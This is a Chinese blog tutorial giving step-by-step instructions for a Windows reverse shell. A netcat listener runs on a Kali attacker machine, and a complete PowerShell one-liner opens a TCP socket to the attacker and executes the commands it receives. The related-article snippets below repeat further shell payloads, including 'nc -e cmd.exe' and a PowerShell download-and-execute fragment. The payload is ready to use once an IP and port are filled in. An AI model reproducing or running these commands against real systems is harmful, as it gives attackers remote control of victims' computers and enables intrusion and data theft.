简单易上手!Windows反弹shell实现

已于 2024-01-03 09:23:13 修改
阅读量464 收藏 8
点赞数 6
分类专栏: 网络安全 文章标签: windows 网络安全 安全
于 2024-01-02 20:30:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54475173/article/details/135348988
版权

直奔主题,上操作流程

友情提示:攻击机为kali,靶机为Windows11

  1. 用攻击机的命令行监听一个目标端口
nc -lvvp 目标端口

在这里插入图片描述

  1. 在Windows桌面同时按住shift和鼠标右键,选择在此处打开powershell窗口
    在这里插入图片描述
    输入以下指令
 $LHOST = "攻击机IP地址"; $LPORT = 攻击机监听的目标端口; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream =$TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0,$Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0,
>> $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output =try { Invoke-Expression ($Code) 2>&1 } catch { $_ };$StreamWriter.Write("$Output`n"); $Code = $null } }; $TCPClient.Close();$NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()

在这里插入图片描述
3. 随后攻击机上就会显示靶机的IP地址,并可以使用DOS指令获取靶机的信息了
在这里插入图片描述

注意:如果在攻击机输入相关指令过后返回的数据出现中文乱码的情况,输入chcp 65001即可

白日懵
关注
  • 6
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【Network Security!】Web安全学习及异或解密示例
李响
02-22 1023
文章目录一.工具&术语1.网安术语2.常用工具3.推荐文章二.常见攻击1.SQL注入2.XSS跨站3.越权漏洞三.音乐异或解密示例 一.工具&术语 1.网安术语 常见安全网站及论坛: 看雪(https://bbs.pediy.com/) 安全客(https://www.anquanke.com) freebuf(https://www.freebuf.com/) 安全牛(http...
黑客术语
05-19 5728
系统篇肉鸡肉鸡就是具有最高管理权限的远程电脑。简单的说就是受你控制的远程电脑。肉鸡可以是win、Unix/Linux……等各种系统;肉鸡可以是一家公司的服务器,一家网站的服务器,甚至是美国白宫或军方的电脑,只要你有这本事入侵并控制他,要登陆肉鸡,必须知道3个参数:远程电脑的IP、用户名、密码。3389、4899肉鸡3389是Windows终端服务(Terminal Services)所默认使用的端...
Windows的几种常用反弹shell方法
hackzkaq的博客
02-21 1万+
零基础学黑客,搜索公众号:白帽子左一 简介:shell类似于DOS下的COMMAND.COM和后来的cmd.exe,它接收用户命令,然后调用相应的应用程序,也可以通俗的说是命令执行环境。分为交互式shell,与非交互式shell。 交互shell就是shell等待你的输入,并且立即执行你提交的命令,这种模式被称作交互式是因为shell与用户进行交互。 非交互shell不会与用户进行交互,而是用户读取存放在文件中的命令或者输入的命令,并且执行它们。当它读到文件的结尾,shell也就终止了。 1.nc反弹sh
内网渗透之Windows反弹shell(一)
不知名白帽的博客
07-08 2050
内网渗透之Windows反弹shell(一)(反向shell简介、Windows反弹shell
Windows 反弹 Shell
weixin_30414245的博客
08-03 544
NC 反弹 shell 攻击场景:   Victim IP: 192.168.2.10   Attacker IP:192.168.2.11 正向 Shell 我们想要弹回Victim的Shell,使用如下命令: Victim:nc -lvp 9999 -e cmd.exe Attacker:nc 192.168.2.10 9999 ps:先在肉鸡上开一个cm...
Windows反弹Shell
最新发布
qq_62073002的博客
04-26 976
正向shell: 控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。反向shell(反弹shell)︰ 被控端主动发起连接请求去连接控制端,通常被控端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。靶机:win11攻击机:vps。
Window下的反弹shell
qq_58000413的博客
05-05 1241
什么是正向shell?正向shell:控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。反向shell:被控制端主动发起连接去请求连接控制,通常被控端由于防火墙受限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。
牛掰了!黑客中的利器-Windows提权小结
weixin_55551408的博客
03-19 683
本节主要针对Windows操作系统下的权限提升进行介绍,提权是后渗透重要的一环节,在权限较低的情况下,站在攻击者的视角进行内部网络安全测试、系统安全测试、应用安全测试等方面会出现“束缚”,所测试出的质量与结果也会不同。本文基于Win操作系统下分别从内核漏洞、权限配置、DLL注入、注册表等方面展开介绍,其中包含漏洞本身的介绍、漏洞复现过程等内容的展现。该提权内容的阅读没有前后顺序,可根据读者自身所需进行全文阅读或某方向内容的阅读。 提权背景 权限提升意味着用户获得不允许他使用的权限。比如从一个普通用户,通
MAC下终极 Shell——ZSH
berber78的专栏
02-18 1万+
原文地址:http://zhuanlan.zhihu.com/mactalk/19556676 在开始今天的 MacTalk 之前,先问两个问题吧: 1、相对于其他系统,Mac 的主要优势是什么? 2、你们平时用哪种 Shell? …… 第一个童靴可以坐下了,Mac 的最大优势是 GUI 和命令行的完美结合,不要把所有注意力放在 Mac 性感的腰身和明媚的显示屏上好吧,这不是
一篇文章让你快速上metasploit(美少妇)
weixin_44344395的博客
11-25 1228
Msfconsole基本使用 前言 本文目的仅是分享记录学习过程,请勿用做非法用途。 Metasploit一个号称可以黑掉整个世界的神器,很多初学者刚接触的时候都觉得很复杂。笔者也花了不少的时间也才入的,下文分享一些简单的用法。 常用参数介绍: 在kali系统里面是集成了接口的,只需要在终端输入msfconsole进入当前页面 即可访问和使用Metasploit里面的所有的插件和模块,以及第三...
cmd反弹shell提权
10-24
cmd反弹shell提权
Windows反弹shell测试
oscarli的博客
05-30 337
windows反弹shell测试记录
Windows 反弹shell方法
weixin_53747497的博客
07-12 2840
正向shell : 控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。反向shell反弹shell):被控端主动发起连接请求去连接控制端,通常被控端 由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送 过来的数据包。
windows 反弹shell_windows版瑞士军刀powercat之牛刀小试
weixin_39963080的博客
12-12 243
时间过的太快,又到深夜了,又要开始刷抖音或网抑云了。今天一位同事因为晚上没有加班,去拿20块钱的夜宵,被举报了。这种在领导面前打小报告的人,职场里面非常多。同事之间要多堤防着,保不准哪一天其中有人会出卖你。这篇文章做了4个小实验:powercat 正向shellwindows-linux)powercat 反向shellwindows-linux)powercat 反向powershell(w...
渗透测试-window反弹shell
lza20001103的博客
05-11 4652
window反弹shell
windows反弹shell复现
就是我的博客
04-06 1万+
windows反弹shell 简介: reverse shell反弹shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell类似,本质上是网络概念的客户端与服务端的角色反转,就是让目标机执行反向连接攻击机。 在实战中多配置命令执行等漏洞进行使用。 环境: 攻击机:IP为192.168.1.111,系统信息 Linux kali 5.10.0-kali3-amd6...
Windows系统反弹shell常见方法总结
Bird&Bird
07-17 3639
目录一、Powercat反弹shell二、Nishang反弹shell三、UDP反弹shell四、Metasploit反弹shell五、nc反弹 一、Powercat反弹shell powercat下载: powercat. powercat 是一个 函数。首先,需要先加载该函数,然后才能执行它。加载方式有两种: 其一:下载powercat.ps1至本地,并加载 其二:从URL加载 powershell IEX (New-Object System.Net.Webclient).DownloadStri
《红蓝攻防对抗实战》六.常规反弹之利用NC在windows系统执行反弹shell
热门推荐
一只特立独行的兔先森
10-23 2万+
假设在内网环境中发现主机,通过漏洞获取到该主机控制权限,想要进一步对内网环境进行后续利用,这里可以通过反弹shell的方式去进行穿透,本次实验以nc工具为例来演示不同系统的操作
利用WinRM实现内网无文件攻击反弹shell
蚁景网安学院
08-27 318
0x00:前言WinRM是WindowsRemoteManagementd(win远程管理)的简称。基于Web服务管理(WS-Management)标准,使用80端口或者443端口。这样...
实战Linux Shell编程宝典:快速上与进阶技巧
作者力求让读者既能快速上,又能不断深入学习,书中内容涵盖了Shell脚本的基础构造、变量与参数处理、流程控制、函数定义、错误处理、文件和目录操作、以及与外部工具的交互等核心主题。此外,书中还穿插了丰富的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

白日懵

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值